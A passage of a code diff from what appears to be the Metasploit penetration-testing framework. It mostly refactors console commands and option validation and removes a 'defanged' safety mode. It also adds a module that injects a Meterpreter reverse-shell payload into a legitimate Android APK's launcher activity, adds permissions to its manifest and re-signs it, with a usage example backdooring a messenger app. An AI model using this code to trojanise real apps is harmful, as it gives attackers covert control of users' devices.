b/lib/msf/core/opt_base.rb index 566f53703f..b332788bc5 100644 --- a/lib/msf/core/opt_base.rb +++ b/lib/msf/core/opt_base.rb @@ -75,6 +75,13 @@ module Msf return (type == in_type) end + # + # Returns true if this option can be validated on assignment + # + def validate_on_assignment? + true + end + # # If it's required and the value is nil or empty, then it's not valid. # diff --git a/lib/msf/core/opt_path.rb b/lib/msf/core/opt_path.rb index 6a40d48fef..23a23a1671 100644 --- a/lib/msf/core/opt_path.rb +++ b/lib/msf/core/opt_path.rb @@ -12,6 +12,10 @@ class OptPath < OptBase return 'path' end + def validate_on_assignment? + false + end + # Generally, 'value' should be a file that exists. def valid?(value) return false if empty_required_value?(value) diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index 295ae04538..97fb9db7ec 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -7,24 +7,17 @@ module Msf # Network port option. # ### -class OptPort < OptBase +class OptPort < OptInt def type return 'port' end - def normalize(value) - value.to_i - end - def valid?(value) - return false if empty_required_value?(value) - - if ((value != nil and value.to_s.empty? == false) and - ((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535))) - return false + if !required? and value.to_s.empty? + super + else + super && normalize(value) <= 65535 && normalize(value) >= 0 end - - return super end end diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 7da13693d9..b144334165 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb @@ -12,8 +12,12 @@ class OptRaw < OptBase return 'raw' end + def validate_on_assignment? + false + end + def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/opt_regexp.rb b/lib/msf/core/opt_regexp.rb index d7056dd63b..bb743077db 100644 --- a/lib/msf/core/opt_regexp.rb +++ b/lib/msf/core/opt_regexp.rb @@ -29,7 +29,7 @@ class OptRegexp < OptBase def normalize(value) return nil if value.nil? - return Regexp.compile(value) + return Regexp.compile(value.to_s) end def display_value(value) diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 88818cb036..459ac08cc6 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -12,8 +12,12 @@ class OptString < OptBase return 'string' end + def validate_on_assignment? + false + end + def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb new file mode 100644 index 0000000000..7aa9c34bb6 --- /dev/null +++ b/lib/msf/core/payload/apk.rb @@ -0,0 +1,206 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'rex/text' +require 'tmpdir' +require 'nokogiri' +require 'fileutils' +require 'optparse' +require 'open3' + +module Msf::Payload::Apk + + class ApkBackdoor + include Msf::Payload::Apk + def backdoor_apk(apk, payload) + backdoor_payload(apk, payload) + end + end + + def print_status(msg='') + $stderr.puts "[*] #{msg}" + end + + def print_error(msg='') + $stderr.puts "[-] #{msg}" + end + + def usage + print_error "Usage: #{$0} -x [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} -x messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + end + + def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end + end + + # Find the activity that is opened when you click the app icon + def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("targetActivity") + unless activityname + activityname = activity.attribute("name") + end + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + name = activityname.to_s + if name.start_with?('.') + name = package + name + end + return name + end + end + end + end + + def fix_manifest(tempdir) + payload_permissions=[] + + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } + + original_permissions=[] + apk_mani="" + + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } + + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print_status("Adding #{permission}") + add_permissions << permission + end + end + + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } + end + + def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage + raise RuntimeError, "Invalid template: #{apkfile}" + end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + raise RuntimeError, "jarsigner not found. If it's not in your PATH, please add it." + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + raise RuntimeError, "apktool not found. If it's not in your PATH, please add it." + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1." + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print_status "Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print_status "Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print_status "Locating hook point..\n" + launcheractivity = find_launcher_activity(amanifest) + unless launcheractivity + raise RuntimeError, "Unable to find hookable activity in #{apkfile}\n" + end + smalifile = "#{tempdir}/original/smali*/" + launcheractivity.gsub(/\./, "/") + ".smali" + smalifiles = Dir.glob(smalifile) + for smalifile in smalifiles + if File.readable?(smalifile) + activitysmali = File.read(smalifile) + end + end + + unless activitysmali + raise RuntimeError, "Unable to find hook point in #{smalifiles}\n" + end + + entrypoint = ';->onCreate(Landroid/os/Bundle;)V' + unless activitysmali.include? entrypoint + raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n" + end + + print_status "Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + + payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(entrypoint, payloadhook) + + print_status "Loading #{smalifile} and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = "#{tempdir}/output.apk" + print_status "Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print_status "Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + outputapk = File.read(injected_apk) + + FileUtils.remove_entry tempdir + outputapk + end +end + + diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb index 80ff558804..e884fa1aca 100644 --- a/lib/msf/core/payload/ruby.rb +++ b/lib/msf/core/payload/ruby.rb @@ -10,7 +10,7 @@ module Msf::Payload::Ruby [ # Since space restrictions aren't really a problem, default this to # true. - Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ]) ] ) end diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 58ad420cfe..b6ccf75131 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate # for discussion. # def prepend_migrate? - !!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true') + datastore['PrependMigrate'] end # diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b4c436e561..2879093ba7 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'msf/core/payload/apk' require 'active_support/core_ext/numeric/bytes' module Msf @@ -305,9 +306,15 @@ module Msf # @return [String] A string containing the bytes of the payload in the format selected def generate_payload if platform == "java" or arch == "java" or payload.start_with? "java/" - p = generate_java_payload - cli_print "Payload size: #{p.length} bytes" - p + raw_payload = generate_java_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload + elsif payload.start_with? "android/" and not template.blank? + cli_print "Using APK template: #{template}" + apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new() + raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload) + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload else raw_payload = generate_raw_payload raw_payload = add_shellcode(raw_payload) @@ -369,7 +376,7 @@ module Msf encoders << e if e end encoders.sort_by { |my_encoder| my_encoder.rank }.reverse - elsif badchars.present? + elsif !badchars.empty? && !badchars.nil? framework.encoders.each_module_ranked('Arch' => [arch], 'Platform' => platform_list) do |name, mod| e = framework.encoders.create(name) e.datastore.import_options_from_hash(datastore) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index d851b1f501..ef80fadf3c 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,5 +1,7 @@ # -*- coding: binary -*- +require 'msf/util/document_generator' + module Msf module RPC class RPC_Module < RPC_Base @@ -70,6 +72,17 @@ class RPC_Module < RPC_Base end + # Returns detailed information about a module in HTML. + # + # @return [String] HTML file. + # @example Here's how you would use this from the client: + # rpc.call('module.info_html', 'exploit', 'windows/smb/ms08_067_netapi') + def rpc_info_html(mtype, mname) + m = _find_module(mtype, mname) + Msf::Util::DocumentGenerator.get_module_document(m) + end + + # Returns the metadata for a module. # # @param [String] mtype Module type. Supported types include (case-sensitive): diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 0a5506fa03..dc5ef2696d 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -3,36 +3,6 @@ # Provides some sanity checks against the ruby build and version # -# Check for the broken pack/unpack in OS X 10.4.x -if ([1].pack('n') == "\x01\x00") - $stderr.puts "*** This ruby build has a broken pack/unpack implementation! " - - if (RUBY_PLATFORM =~ /darwin/) - $stderr.puts " Apple shipped a broken version of ruby with the 10.4.x " - $stderr.puts " release. Please install ruby from source, or use one of " - $stderr.puts " the free package managers to obtain a working ruby build." - end - - exit(0) -end - -# Check for ruby 1.8.2 as the minimal supported version -if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/) - $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+" - exit(0) -end - -# Check for ruby 1.9.0 and throw a big nasty warning -if (RUBY_VERSION =~ /^1\.9\.0/) - $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer." - exit(0) -end - -# Check for ruby 1.9.1 and throw a warning -if (RUBY_VERSION =~ /^1\.9\.1/) - $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer." -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) @@ -56,56 +26,3 @@ rescue ::LoadError $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" end - - -# -# Check for the ugly 1.8.7 short-named constants bug -# - -class ConstBugTestA - Const = 'A' - def test - Const == 'A' - end -end - -ConstBugTestC = ConstBugTestA.dup - -class ConstBugTestB < ConstBugTestC - Const = 'B' -end - -def ruby_187_const_bug - bugged = false - - begin - ConstBugTestA.new.test() - ConstBugTestB.new.test() - rescue ::NameError - bugged = true - end - - bugged -end - -if(ruby_187_const_bug()) - $stderr.puts "" - $stderr.puts "***********************************************************************" - $stderr.puts "*** *" - $stderr.puts "*** This version of the Ruby interpreter contains a serious bug *" - $stderr.puts "*** related to short-named constants, we strongly recommend that you *" - $stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *" - $stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *" - $stderr.puts "*** your vendor and ask them to review the URL below. *" - $stderr.puts "*** *" - $stderr.puts "*** Alternatively, you can download, build, and install the latest *" - $stderr.puts "*** stable snapshot of Ruby from the following URL: *" - $stderr.puts "*** - http://www.ruby-lang.org/ *" - $stderr.puts "*** *" - $stderr.puts "*** For more information, please see the following URL: *" - $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *" - $stderr.puts "*** *" - $stderr.puts "***********************************************************************" - $stderr.puts "" -end - diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index c8bcd12e52..0d3155c755 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -60,12 +60,6 @@ module CommandDispatcher def active_session=(mod) driver.active_session = mod end - # - # Checks to see if the driver is defanged. - # - def defanged? - driver.defanged? - end # # Logs an error message to the screen and the log file. The callstack is diff --git a/lib/msf/ui/console/command_dispatcher/auxiliary.rb b/lib/msf/ui/console/command_dispatcher/auxiliary.rb index b667c6367c..19bf3fb964 100644 --- a/lib/msf/ui/console/command_dispatcher/auxiliary.rb +++ b/lib/msf/ui/console/command_dispatcher/auxiliary.rb @@ -72,8 +72,6 @@ class Auxiliary # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil action = mod.datastore['ACTION'] jobify = false diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index a05d06080f..bfcef247c1 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -16,6 +16,7 @@ require 'msf/ui/console/command_dispatcher/nop' require 'msf/ui/console/command_dispatcher/payload' require 'msf/ui/console/command_dispatcher/auxiliary' require 'msf/ui/console/command_dispatcher/post' +require 'msf/util/document_generator' module Msf module Ui @@ -34,18 +35,19 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( - "-c" => [ true, "Run a command on the session given with -i, or all"], - "-h" => [ false, "Help banner" ], - "-i" => [ true, "Interact with the supplied session ID" ], - "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List verbose fields" ], - "-q" => [ false, "Quiet mode" ], - "-k" => [ true, "Terminate sessions by session ID and/or range" ], - "-K" => [ false, "Terminate all sessions" ], - "-s" => [ true, "Run a script on the session given with -i, or all"], - "-r" => [ false, "Reset the ring buffer for the session given with -i, or all"], - "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], - "-t" => [ true, "Set a response timeout (default: 15)"]) + "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-h" => [ false, "Help banner" ], + "-i" => [ true, "Interact with the supplied session ID " ], + "-l" => [ false, "List all active sessions" ], + "-v" => [ false, "List sessions in verbose mode" ], + "-q" => [ false, "Quiet mode" ], + "-k" => [ true, "Terminate sessions by session ID and/or range" ], + "-K" => [ false, "Terminate all sessions" ], + "-s" => [ true, "Run a script on the session given with -i, or all" ], + "-r" => [ false, "Reset the ring buffer for the session given with -i, or all" ], + "-u" => [ true, "Upgrade a shell to a meterpreter session on many platforms" ], + "-t" => [ true, "Set a response timeout (default: 15)" ], + "-x" => [ false, "Show extended information in the session table" ]) @@jobs_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], @@ -94,10 +96,6 @@ class Core "-h" => [ false, "Help banner." ], "-e" => [ true, "Expression to evaluate." ]) - # The list of data store elements that cannot be set when in defanged - # mode. - DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] - # Constant for disclosure date formatting in search functions DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" @@ -223,6 +221,13 @@ class Core end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + cmd_banner() end @@ -743,7 +748,9 @@ class Core def cmd_info_help print_line "Usage: info [mod2 mod3 ...]" print_line - print_line "Optionally the flag '-j' will print the data in json format" + print_line "Options:" + print_line "* The flag '-j' will print the data in json format" + print_line "* The flag '-d' will show the markdown version with a browser. More info, but could be slow." print_line "Queries the supplied module or modules for information. If no module is given," print_line "show info for the currently active module." print_line @@ -754,15 +761,25 @@ class Core # def cmd_info(*args) dump_json = false + show_doc = false + if args.include?('-j') args.delete('-j') dump_json = true end + if args.include?('-d') + args.delete('-d') + show_doc = true + end + if (args.length == 0) if (active_module) if dump_json print(Serializer::Json.dump_module(active_module) + "\n") + elsif show_doc + print_status("Please wait, generating documentation for #{active_module.shortname}") + Msf::Util::DocumentGenerator.spawn_module_document(active_module) else print(Serializer::ReadableText.dump_module(active_module)) end @@ -783,6 +800,9 @@ class Core print_error("Invalid module: #{name}") elsif dump_json print(Serializer::Json.dump_module(mod) + "\n") + elsif show_doc + print_status("Please wait, generating documentation for #{mod.shortname}") + Msf::Util::DocumentGenerator.get_module_document(mod) else print(Serializer::ReadableText.dump_module(mod)) end @@ -808,7 +828,7 @@ class Core end end - args.each { |name| + args.each do |name| mod = framework.modules.create(name) if (mod == nil) @@ -816,7 +836,7 @@ class Core else show_options(mod) end - } + end end # @@ -860,8 +880,6 @@ class Core # Goes into IRB scripting mode # def cmd_irb(*args) - defanged? - expressions = [] # Parse the command options @@ -1210,8 +1228,6 @@ class Core # the framework root plugin directory is used. # def cmd_load(*args) - defanged? - if (args.length == 0) cmd_load_help return false @@ -1306,65 +1322,57 @@ class Core return false end - arg = args.shift - case arg + action = args.shift + case action when "add", "remove", "del" - if (args.length < 3) - print_error("Missing arguments to route #{arg}.") + subnet = args.shift + subnet,cidr_mask = subnet.split("/") + + if cidr_mask + netmask = Rex::Socket.addr_ctoa(cidr_mask.to_i) + else + netmask = args.shift + end + + gateway_name = args.shift + + if (subnet.nil? || netmask.nil? || gateway_name.nil?) + print_error("Missing arguments to route #{action}.") return false end - # Satisfy check to see that formatting is correct - unless Rex::Socket::RangeWalker.new(args[0]).length == 1 - print_error "Invalid IP Address" - return false - end + gateway = nil - unless Rex::Socket::RangeWalker.new(args[1]).length == 1 - print_error "Invalid Subnet mask" - return false - end - - gw = nil - - # Satisfy case problems - args[2] = "Local" if (args[2] =~ /local/i) - - begin - # If the supplied gateway is a global Comm, use it. - if (Rex::Socket::Comm.const_defined?(args[2])) - gw = Rex::Socket::Comm.const_get(args[2]) - end - rescue NameError - end - - # If we still don't have a gateway, check if it's a session. - if ((gw == nil) and - (session = framework.sessions.get(args[2])) and - (session.kind_of?(Msf::Session::Comm))) - gw = session - elsif (gw == nil) - print_error("Invalid gateway specified.") - return false - end - - if arg == "remove" or arg == "del" - worked = Rex::Socket::SwitchBoard.remove_route(args[0], args[1], gw) - if worked - print_status("Route removed") + case gateway_name + when /local/i + gateway = Rex::Socket::Comm::Local + when /^[0-9]+$/ + session = framework.sessions.get(gateway_name) + if session.kind_of?(Msf::Session::Comm) + gateway = session + elsif session.nil? + print_error("Not a session: #{gateway_name}") + return false else - print_error("Route not found") + print_error("Cannout route through specified session (not a Comm)") + return false end else - worked = Rex::Socket::SwitchBoard.add_route(args[0], args[1], gw) - if worked - print_status("Route added") - else - print_error("Route already exists") - end + print_error("Invalid gateway") + return false end + msg = "Route " + if action == "remove" or action == "del" + worked = Rex::Socket::SwitchBoard.remove_route(subnet, netmask, gateway) + msg << (worked ? "removed" : "not found") + else + worked = Rex::Socket::SwitchBoard.add_route(subnet, netmask, gateway) + msg << (worked ? "added" : "already exists") + end + print_status(msg) + when "get" if (args.length == 0) print_error("You must supply an IP address.") @@ -1476,8 +1484,6 @@ class Core # restarts of the console. # def cmd_save(*args) - defanged? - # Save the console config driver.save_config @@ -1508,8 +1514,6 @@ class Core # Adds one or more search paths. # def cmd_loadpath(*args) - defanged? - if (args.length == 0 or args.include? "-h") cmd_loadpath_help return true @@ -1757,12 +1761,13 @@ class Core # def cmd_sessions(*args) begin - method = nil - quiet = false - verbose = false - sid = nil - cmds = [] - script = nil + method = nil + quiet = false + show_extended = false + verbose = false + sid = nil + cmds = [] + script = nil reset_ring = false response_timeout = 15 @@ -1779,6 +1784,8 @@ class Core when "-c" method = 'cmd' cmds << val if val + when "-x" + show_extended = true when "-v" verbose = true # Do something with the supplied session identifier instead of @@ -2041,7 +2048,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_extended => show_extended, :verbose => verbose)) print_line end @@ -2163,22 +2170,21 @@ class Core @cache_payloads = nil end - # Security check -- make sure the data store element they are setting - # is not prohibited - if global and DefangedProhibitedDataStoreElements.include?(name) - defanged? - end - # If the driver indicates that the value is not valid, bust out. if (driver.on_variable_set(global, name, value) == false) print_error("The value specified for #{name} is not valid.") return true end - if append - datastore[name] = datastore[name] + value - else - datastore[name] = value + begin + if append + datastore[name] = datastore[name] + value + else + datastore[name] = value + end + rescue OptionValidateError => e + print_error(e.message) + elog(e.message) end print_line("#{name} => #{datastore[name]}") @@ -2190,7 +2196,6 @@ class Core # @param str [String] the string currently being typed before tab was hit # @param words [Array] the previously completed words on the command line. words is always # at least 1 when tab completion has reached this stage since the command itself has been completed - def cmd_set_tabs(str, words) # A value has already been specified @@ -2595,9 +2600,9 @@ class Core # Tab completion for the unset command # # @param str [String] the string currently being typed before tab was hit - # @param words [Array] the previously completed words on the command line. words is always - # at least 1 when tab completion has reached this stage since the command itself has been completed - + # @param words [Array] the previously completed words on the command + # line. `words` is always at least 1 when tab completion has reached this + # stage since the command itself has been completed. def cmd_unset_tabs(str, words) datastore = active_module ? active_module.datastore : self.framework.datastore datastore.keys @@ -2834,16 +2839,8 @@ class Core # Returns the revision of the framework and console library # def cmd_version(*args) - svn_console_version = "$Revision: 15168 $" - svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil - if svn_metasploit_version - print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}") - else - print_line("Framework: #{Msf::Framework::Version}") - end - print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}") - - return true + print_line("Framework: #{Msf::Framework::Version}") + print_line("Console : #{Msf::Framework::Version}") end def cmd_grep_help @@ -3520,7 +3517,7 @@ class Core next if not o # handle a search string, search deep - if( + if ( not regex or o.name.match(regex) or o.description.match(regex) or @@ -3534,7 +3531,7 @@ class Core mod_opt_keys = o.options.keys.map { |x| x.downcase } opts.each do |opt,val| - if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val) + if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val) show = false end end diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f3c36e8463..d2b59bdf5e 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -463,7 +463,7 @@ class Db if search_term next unless ( host.attribute_names.any? { |a| host[a.intern].to_s.match(search_term) } || - !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).order("tags.id DESC").empty? + !Mdm::Tag.includes(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", framework.db.workspace.id, host.address, search_term.source).references(:hosts).order("tags.id DESC").empty? ) end @@ -1033,7 +1033,7 @@ class Db ::ActiveRecord::Base.connection_pool.with_connection { query = Metasploit::Credential::Core.where( workspace_id: framework.db.workspace ) - query = query.includes(:private, :public, :logins) + query = query.includes(:private, :public, :logins).references(:private, :public, :logins) query = query.includes(logins: [ :service, { service: :host } ]) if type.present? @@ -1647,6 +1647,7 @@ class Db print_line " Amap Log -m" print_line " Appscan" print_line " Burp Session XML" + print_line " Burp Issue XML" print_line " CI" print_line " Foundstone" print_line " FusionVM XML" diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ea7be2c617..7d73935782 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -49,8 +49,6 @@ class Exploit # Launches an exploitation attempt. # def cmd_exploit(*args) - defanged? - opt_str = nil payload = mod.datastore['PAYLOAD'] encoder = mod.datastore['ENCODER'] @@ -154,8 +152,7 @@ class Exploit else # If we didn't run a payload handler for this exploit it doesn't # make sense to complain to the user that we didn't get a session - disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false - unless disable_handler + unless mod.datastore["DisablePayloadHandler"] fail_msg = 'Exploit completed, but no session was created.' print_status(fail_msg) begin diff --git a/lib/msf/ui/console/command_dispatcher/post.rb b/lib/msf/ui/console/command_dispatcher/post.rb index 8ea990a66d..7b64a01098 100644 --- a/lib/msf/ui/console/command_dispatcher/post.rb +++ b/lib/msf/ui/console/command_dispatcher/post.rb @@ -78,8 +78,6 @@ class Post # Executes an auxiliary module # def cmd_run(*args) - defanged? - opt_str = nil jobify = false quiet = false diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index d2292ba6a9..5e2222a168 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,18 +139,10 @@ class Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true + self.command_passthru = opts.fetch('AllowCommandPassthru', true) # Whether or not to confirm before exiting - self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false - - # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] == true - - # If we're defanged, then command passthru should be disabled - if @defanged - self.command_passthru = false - end + self.confirm_exit = opts['ConfirmExit'] # Parse any specified database.yml file if framework.db.usable and not opts['SkipDatabaseInit'] @@ -535,6 +527,13 @@ class Driver < Msf::Ui::Driver end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + framework.events.on_ui_start(Msf::Framework::Revision) if $msf_spinner_thread @@ -563,7 +562,7 @@ class Driver < Msf::Ui::Driver if (framework and framework.payloads.valid?(val) == false) return false - elsif active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) + elsif active_module && active_module.type == 'exploit' && !active_module.is_payload_compatible?(val) return false elsif (active_module) active_module.datastore.clear_non_user_defined @@ -623,17 +622,6 @@ class Driver < Msf::Ui::Driver # attr_accessor :active_resource - # - # If defanged is true, dangerous functionality, such as exploitation, irb, - # and command shell passthru is disabled. In this case, an exception is - # raised. - # - def defanged? - if @defanged - raise DefangedException - end - end - def stop framework.events.on_ui_stop() super @@ -652,7 +640,7 @@ protected def unknown_command(method, line) [method, method+".exe"].each do |cmd| - if (command_passthru == true and Rex::FileUtils.find_full_path(cmd)) + if command_passthru && Rex::FileUtils.find_full_path(cmd) print_status("exec: #{line}") print_line('') @@ -762,17 +750,6 @@ protected end end -# -# This exception is used to indicate that functionality is disabled due to -# defanged being true -# -class DefangedException < ::Exception - def to_s - "This functionality is currently disabled (defanged mode)" - end -end - - end end end diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 07bcef3693..12fe0fcae2 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -122,8 +122,6 @@ module ModuleCommandDispatcher # Checks to see if a target is vulnerable. # def cmd_check(*args) - defanged? - ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || '' opt = Msf::OptAddressRange.new('RHOSTS') @@ -176,7 +174,7 @@ module ModuleCommandDispatcher def check_simple(instance=nil) unless instance - instance = mod + instance = mod end rhost = instance.datastore['RHOST'] @@ -193,13 +191,13 @@ module ModuleCommandDispatcher 'LocalOutput' => driver.output) if (code and code.kind_of?(Array) and code.length > 1) if (code == Msf::Exploit::CheckCode::Vulnerable) - print_good("#{peer} - #{code[1]}") + print_good("#{code[1]}") report_vuln(instance) else - print_status("#{peer} - #{code[1]}") + print_status("#{code[1]}") end else - msg = "#{peer} - Check failed: The state could not be determined." + msg = "Check failed: The state could not be determined." print_error(msg) elog("#{msg}\n#{caller.join("\n")}") end @@ -213,7 +211,7 @@ module 